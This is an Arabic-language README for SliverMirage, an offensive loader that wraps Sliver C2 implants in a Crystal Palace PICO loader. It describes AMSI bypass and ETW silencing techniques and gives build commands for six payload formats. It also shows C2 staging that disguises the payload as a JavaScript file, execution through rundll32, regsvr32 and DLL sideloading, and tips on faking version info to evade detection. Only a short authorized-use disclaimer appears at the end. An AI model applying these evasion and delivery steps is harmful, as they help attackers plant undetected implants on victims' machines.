
Crystal Palace PICO loader for Sliver C2 | تجاوز AMSI ثنائي الطبقات، إسكات ETW، حمولات مشفرة بـ AES-256-CBC، 6 متغيرات تسليم
مشتق من CrystalSliver، يوسّع محمّل Crystal Palace PICO بإضافة تجاوز AMSI مزدوج الطبقات، وإسكات ETW، وستة أشكال تسليم لـ Sliver C2.
يقوم SliverMirage بلفّ DLL الخاص بحقنة Sliver عبر محاكاة PICO من Crystal Palace، ثم يسلّمه عبر محمّل يتغلب على AMSI وETW دون تصحيح amsi.dll أو ntdll.dll.
حزمة التهرب:
| الطبقة | التقنية | التفاصيل |
|---|
| AMSI L1 | إفساد سلسلة CLR | يعترض LdrRegisterDllNotification تحميل clr.dll، ويفسد AmsiScanBuffer في .rdata قبل أن يستدعي CLR الدالة GetProcAddress |
| AMSI L2 | VEH + HWBP | معالج الاستثناءات الموجه (VEH) على AmsiScanBuffer يُرجع E_INVALIDARG |
| ETW | HWBP | DR1 على NtTraceControl، يُرجع STATUS_SUCCESS |
| الحمولة | AES-256-CBC + XOR | فك تشفير BCrypt، VirtualAlloc(RW) -> VirtualProtect(RX)، بدون أي RWX |
| المحاكاة | Crystal Palace PICO | يعمل DLL الخاص بـ Sliver داخل عملية PICO، غير مرئي لمضادات الفيروسات في وضع المستخدم |
| الصيغة | الملف | التسليم | C2 في وقت التشغيل؟ |
|---|---|---|---|
exe | EXE مرحلي | EXE + payload.dat على موقع C2 | نعم (HTTPS) |
exe-stageless | EXE غير مرحلي | EXE واحد | لا |
dll | DLL غير مرحلي | DLL واحد | لا |
dll-staged | DLL مرحلي | DLL + payload.dat على موقع C2 | نعم (HTTPS) |
shellcode | شيلكود مرحلي | .bin + payload.dat | نعم (HTTPS) |
shellcode-stageless | شيلكود غير مرحلي | .bin واحد | لا |
الأشكال المرحلية تقوم بتنزيل PICO المشفّر وقت التشغيل من موقع HTTPS خاص بـ Sliver. يكون حجم EXE/DLL صغيرًا (~20 كيلوبايت) ولا يحمل أي حمولة على القرص.
الأشكال غير المرحلية تدمج PICO المشفّر وقت الترجمة (طبقة مزدوجة XOR + AES). حجمها أكبر على القرص لكن بدون أي نشاط شبكي قبل اتصال الـ beacon.
x86_64-w64-mingw32-gcc (mingw-w64)nasmpython3 مع pefile (pip install pefile)opensslbuild.sh)يقوم سكريبت البناء بتجهيز التبعيات المفقودة تلقائيًا (بما في ذلك Crystal Palace وJava 17) ويتعامل مع خط الإنتاج كاملًا: DLL -> Crystal Palace PICO -> تشفير -> ترجمة.
# Staged EXE (default)
./build.sh --dll /path/to/sliver_implant.dll --host 10.0.0.1
# Stageless EXE
./build.sh --dll /path/to/sliver_implant.dll --format exe-stageless
# Stageless DLL
./build.sh --dll /path/to/sliver_implant.dll --format dll
# Staged DLL
./build.sh --dll /path/to/sliver_implant.dll --format dll-staged --host 10.0.0.1
# Shellcode (staged)
./build.sh --dll /path/to/sliver_implant.dll --format shellcode --host 10.0.0.1
# Shellcode (stageless)
./build.sh --dll /path/to/sliver_implant.dll --format shellcode-stageless
الخيارات:
--dll <path> — DLL حقنة Sliver (مطلوب)--host <ip> — عنوان IP لخادم C2 (مطلوب للصيغ المرحلية)--port <port> — منفذ C2 (الافتراضي: 443)--path <path> — مسار URL لتنزيل الحمولة (الافتراضي: /assets/js/vendor.js)--format <fmt> — صيغة الإخراج (الافتراضي: exe)--export <name> — اسم تصدير مخصص لـ DLLإذا كان لديك بالفعل blob من Crystal Palace PICO:
# Staged EXE
make PICO=/path/to/implant.crystal.bin C2_HOST=10.0.0.1
# Stageless EXE
make exe-stageless PICO=/path/to/implant.crystal.bin
# Stageless DLL
make dll PICO=/path/to/implant.crystal.bin
# All targets
make clean
ارفع build/payload.dat إلى موقع HTTPS خاص بـ Sliver:
sliver > websites add-content --website cover \
--web-path /assets/js/vendor.js \
--content-type application/javascript \
--content build/payload.dat
سلّم build/csvchelper.exe (أو .dll) إلى الهدف.
تسليم بملف واحد. لا حاجة لإعداد موقع C2.
rundll32 csvchelper.dll,StartW
regsvr32 /s csvchelper.dll
أو استخدم تحميل DLL الجانبي (sideloading) (أعد التسمية ليطابق DLL شرعيًا يحمّله التطبيق الهدف).
التصديرات: DllRegisterServer, DllUnregisterServer, StartW, VoidFunc
SliverMirage/
loader/ # Crystal Palace PICO loader (from CrystalSliver)
src/ # Loader C sources + draugr ASM
loader.spec # Crystal Palace linker spec
pico.spec # PICO generation spec
src/
stager_remote.c # Staged EXE
stager_stageless.c # Stageless EXE
stager_remote_dll.c # Staged DLL
stager_stageless_dll.c # Stageless DLL
stager_debug.c # Debug EXE (MessageBox diagnostics)
scripts/
gen_payload.py # AES-256-CBC encrypt (staged)
gen_payload_stageless.py # AES + XOR embed (stageless)
dll_to_shellcode.py # sRDI DLL-to-shellcode converter
resources/
resource.rc # Version info (EXE)
resource_dll.rc # Version info (DLL)
manifest.xml # asInvoker manifest
libtcg.x64.zip # TCG library for Crystal Palace
Makefile
build.sh
kernel32, advapi32, bcrypt — جميعها واجهات برمجة Windows شرعيةVirtualProtect على DLLs النظامWinMain, -mwindows — لا وميض لوحدة التحكمasInvoker المضمّن يكبت استدلالات UACresource.rc / resource_dll.rc بهويتك التغطية قبل البناءهذا المشروع مخصص لأغراض الاختبار الأمني المصرح به والبحث والتعليم فقط. استخدمه حصريًا في بيئات لديك فيها إذن كتابي صريح لإجراء اختبار الاختراق. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. لا يتحمل المؤلفون أي مسؤولية عن إساءة استخدام هذا البرنامج.
MIT